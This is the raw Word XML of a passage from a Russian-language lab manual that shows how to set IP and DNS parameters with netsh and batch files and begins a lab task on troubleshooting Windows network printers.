        </w:rPr>
        <w:t xml:space="preserve">Пример 1. Задать автоматическое получение параметров DNS-сервера по протоколу DHCP для адаптера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netsh interface ip set dnsserver name=</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source=dhcp или netsh interface ip set dnsserver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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример 2. Задать статические параметры DNS-сервера для адаптера </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подключение по локальной сети</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, где первый DNS-сервер имеет IP-адрес 213.108.208.2, а второй 213.108.209.2:</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netsh interface ip set dnsservers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static 213.108.208.2 netsh interface ip add dnsservers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213.108.209.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обратите внимание, что команда set dnsservers сбрасывает список DNS-серверов для выбранного сетевого адаптера и устанавливает первый DNS-сервер в указанное значение. Последующие DNS-сервера добавляются через команду add вместо set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Какие еще параметры можно изменять</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Смотрим на вывод команды</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C:\Windows\system32&gt;netsh interface ip set help Применимы следующие команды: Команды в этом контексте: set address - Задает статический IP-адрес или основной шлюз для интерфейса. set compartment - Изменяет параметры конфигурации секции. set dnsservers - Установка режима DNS-сервера и адресов. set dynamicportrange - Изменяет диапазон портов, используемый для динамического назначения портов. set global - </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Изменяет общие параметры глобальной конфигурации. set interface - Изменяет параметры конфигурации интерфейса для IP. set neighbors - Задает адрес соседа. set route - Изменяет параметры маршрута. set subinterface - Изменяет параметры конфигурации субинтерфейса. set winsservers - Установка режима WINS-сервера и адресов.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Поскольку большинство этих параметров (кроме IP-адреса и DNS-сервера) большинству смертных не потребуется, то и описывать я их не стану. Но Вы всегда сможете получить справку по нужным параметрам, используя за образец команды выше. Каждый раз вводить команды очень утомительно. Поэтому лучше создать файл с расширением </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или более устаревший вариант </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bat</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), где эти команды будут записаны.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример 1. Применение сетевых настроек по протоколу DHCP:</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netsh interface ip set address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 netsh interface ip set dnsserver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dhcp pause</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример 2. Применение статических сетевых настроек:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="132" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="outset" w:sz="6" w:space="0" w:color="auto"/>
          <w:left w:val="outset" w:sz="6" w:space="0" w:color="auto"/>
          <w:bottom w:val="outset" w:sz="6" w:space="0" w:color="auto"/>
          <w:right w:val="outset" w:sz="6" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="111"/>
        <w:gridCol w:w="9515"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidTr="005308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0"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>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530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866">
            <w:pPr>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">netsh interface ip set address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static 213.108.213.117 255.255.255.240 213.108.213.113 netsh interface ip set dnsservers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static 213.108.208.2 netsh interface ip add dnsservers </w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Подключение по локальной сети</w:t>
            </w:r>
            <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 213.108.209.2 pause</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Команда pause в конце скрипта не позволяет закрыться окну. Это важно, если Вы допустили ошибки при наборе команды. Когда команды написаны правильно команду </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pause</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> можно удалить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимание! В локализованных версиях Windows имена сетевых адаптеров написаны на русском языке. Символы кириллицы имеют различные кодовые страницы для Windows-приложений (обычно, графических) и приложений в командной строке. Поэтому важно сохранить файл с командами в кодировке CP866. (Стандартный блокнот не позволяет это сделать.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как вариант можно изменить названия сетевых адаптеров с использованием букв латинского алфавита, просто переименовав их:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1917750" cy="1504666"/>
            <wp:effectExtent l="19050" t="0" r="6300" b="0"/>
            <wp:docPr id="266" name="Рисунок 27725" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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25" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image252.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId226" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1917710" cy="1504634"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Например, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wifi</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cable</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Тогда проблем с кодировками не будет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530866" w:rsidRPr="00617AC0" w:rsidRDefault="00530866" w:rsidP="00530866">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Как было отмечено выше, командные файлы следует запускать под пользователем с правами администратора. Самый простой способ: нажать правой кнопкой на командном файле и выбрать </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запуск от имени администратора</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="00454BB1" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc507788532"/>
      <w:bookmarkStart w:id="118" w:name="_Toc507788257"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="008D764F" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Выявление и устранение проблем сетевых принтеров</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Согласно инструкции из теоретической части выявить и устранить проблемы сетевых принтеров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся скриншоты этапов выполнения работы и комментарии к ним.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Администрирование принтеров – процесс, в котором можно предугадать различные ситуации со сбоями, а затем настроить сетевую печать так, чтобы предотвратить ошибки. Конечно, это легко только на словах. Обычно администраторы начинают работать с параметрами принтеров после того, как возникают проблемы. Использование советов, приведенных в этой статье, поможет предотвратить некоторые самые распространенные проблемы с печатью и поддерживать сетевые принтеры Windows в рабочем состоянии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Рассмотрим решения некоторых распространенных проблем при установке или использовании сетевых принтеров, включая принтеры Bluetooth или беспроводные принтеры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Устанавливаемый принтер не содержится в списке мастера установки принтеров</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если Windows не может определить устанавливаемый принтер, выполните указанные действия для поиска и установки принтера вручную:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Откройте папку </w:t>
      </w:r>
      <w:hyperlink r:id="rId237" w:tooltip="Панель управления" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Панель управления</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:hyperlink r:id="rId238" w:tooltip="Панель управления. Раздел &quot;Оборудование и звук&quot;" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Оборудование и звук</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Принтеры</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Щелкните значок Установка принтера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В диалоговом окне Мастер установки принтеров выберите Установить сетевой, беспроводной принтер или принтер Bluetooth и нажмите кнопку Далее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На странице Выберите сетевой принтер щелкните Принтер отсутствует в списке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На странице Найти принтер по имени или TCP/IP-адресу выберите способ поиска требуемого принтера в зависимости от типа или расположения принтера и нажмите кнопку Далее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выполните остальные указания мастера и нажмите кнопку Готово.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Не удается найти устанавливаемый принтер в папке </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сеть</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы убедиться, что принтеры в сети отображаются, проверьте работу сети. Дополнительные сведения смотрите в разделе </w:t>
      </w:r>
      <w:hyperlink r:id="rId239" w:tooltip="Просмотр состояния сети" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Просмотр состояния сети</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если сеть работает нормально, для устранения проблемы попробуйте выполнить следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D764F" w:rsidRPr="00617AC0" w:rsidRDefault="008D764F" w:rsidP="008D764F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если имя или сетевой адрес (расположение в сети) принтера неизвестны, обратитесь к специалисту, устанавливавшему принтер в сеть, или к системному администратору.</w:t>
      </w:r>
    </w:p>
